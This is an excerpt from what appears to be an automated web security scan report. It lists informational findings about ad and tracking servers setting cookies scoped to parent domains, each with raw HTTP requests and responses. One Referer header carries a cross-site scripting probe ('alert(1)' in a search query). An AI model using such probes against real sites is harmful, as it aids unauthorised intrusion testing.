The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 6172
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=45AC0400-CF32-A440-020A-0900001F0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKgy*39173:2|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKgyAKLp:2|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Fqr0:2|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GV2B:2|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|Fqr0GV2B:2|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

9.8. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/* HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313287862_68296079_as3105_imp|305#1315313287862_68296079_as3105_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:07 GMT
Content-Length: 2563

<!DOCTYPE html>
<!-- Impression Id: 1315313287862_68296079_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...

9.9. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1315313297486_68372787_as3103_imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313297486_68372787_as3103_imp|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: act=a$305#1315313312306_68316035_as3106_clk!1315313297486_68372787_as3103_imp!|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:32 GMT; Path=/tase
Set-Cookie: imp=a$le#1315313312306_68316035_as3106_clk|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:32 GMT; Path=/tase
Location: http://ad.doubleclick.net/clk;233814261;57705890;k
Content-Length: 0
Date: Tue, 06 Sep 2011 12:48:32 GMT


9.10. http://ak1.abmr.net/is/www.burstnet.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.burstnet.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.burstnet.com?U=/enlightn/8117/3E06/&V=3-cwzEbZCyUni%2f8BpqAGOsC1A1e4rKZXfyTH1D5FeHizuf5PRgzsGOFg%3d%3d&I=F72DD362342178E&D=burstnet.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: 01AI=2-2-CEA75E37E6AD97051B199F5C65B08B1FDBBAFC21037372201F06A86726AC8F7B-D1B963138697FBA3A5D965FE009043982D2E891BE605625CC233FC7124123F41

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.burstnet.com/enlightn/8117/3E06/?01AD=3dkYMHVTzFhJCMGPi3NSiBcbGWNRR0UvEfUz4EkxlLyviMUraAANJXw&01RI=F72DD362342178E&01NA=
Expires: Tue, 06 Sep 2011 12:55:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close
Set-Cookie: 01AI=2-2-6E1EAF0179147B5D1D764362679C5E536EABA049D6323A5F5A0B520C95496E5D-C58C8B546BEE2EE1CDACBFEA5A790DA0813F5C3BFA7590E67B9304D8676098A0; expires=Wed, 05-Sep-2012 12:55:53 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


9.11. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6135404&c3=9&c4=9844&c10=3186830&ns__t=1315331133850&ns_c=ISO-8859-1&c8=Click%20here%20to%20find%20out%20more!&c7=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D4%3Bsz%3D728x90%3Bord%3D8383746361359954%3F&c9=http%3A%2F%2Fgames.frontier.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 06 Sep 2011 12:45:33 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 12:45:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.12. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Set-Cookie: adxid=016e3b4e6615bdb5; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

9.13. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; BA=t=1315331123

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Tue Sep 6 12:45:35 UTC 2011 -->

9.14. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sun, 04-Mar-2012 12:50:52 GMT; Path=/
Content-Type: text/javascript
Content-Length: 87
Date: Tue, 06 Sep 2011 12:50:52 GMT

new Image().src="http://d.turn.com/r/dm/mkt/73/mpid//mpuid/2966958661410417168/nu/n";


9.15. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM50061742AC05EN3&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrzr"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQXr"%X%QBeBQXr@Cre%e"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrzr"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCC"%X%QBeBQCCr^riB^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCrizBz%X@rzr"%X%QBeQX%Xz%X%QBe%Xre"%X%QBeQX%X"%X%QBeQX%XiirCCX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605070DMBV6=V1rrrrr"rz%X%QBeBQ@C^%r@QezBz%X@rzr"%X%QBeQX%Xz%X%QBeBQ@C"%X%QBeQX%X"%X%QBeQX%XiirCCX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%@zA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@zBz%XQCzXB"%X%QBeQX%Xz%X%QBer^Xe"%X%QBeQXCQ"%X%QBeQX%XiirCCX"XBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rzBz%X@^zr"%X%QBeQXCQz%X%QBe%%%X"%X%QBeQXCQ"%X%QBeQXCQ^%rQCC"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; CTG=1315265345

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM50061742ACV6=V1rQ(#X"rz%X%QXr^iCBeXr%XQz%zrz%"%X%QXr^iCBz%X%QXr^iCB"%X%QXr^iCX"%X%QXr^iCBeXr%XQ"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XQzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Wed, 05-Sep-2012 11:50:43 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QXr^iCB; path=/; domain=.hitbox.com; expires=Wed, 05-Sep-2012 11:50:43 GMT; max-age=31536000
Set-Cookie: CTG=1315309843; path=/; domain=.hitbox.com; expires=Tue, 13-Sep-2011 11:50:43 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 06 Sep 2011 11:50:44 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

9.16. http://espanol.vonage.com/mpel.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /mpel.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mpel.js?href=http://www.vonage.com/&ref=http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service&lang=en-US HTTP/1.1
Host: espanol.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Set-Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; Version=1; Domain=.vonage.com; Max-Age=31536000; Expires=Wed, 05-Sep-2012 11:50:14 GMT; Path=/
Content-Length: 0


9.17. http://external.dmtracker.com/tags/vs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.dmtracker.com
Path:   /tags/vs.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tags/vs.js HTTP/1.1
Host: external.dmtracker.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 5215
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Jan 2010 20:03:11 GMT
Accept-Ranges: bytes
ETag: "80e95bc08b9fca1:662"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP LAW PSA ADM DEV TAI IVA HIS OUR IND"
X-Powered-By: ASP.NET
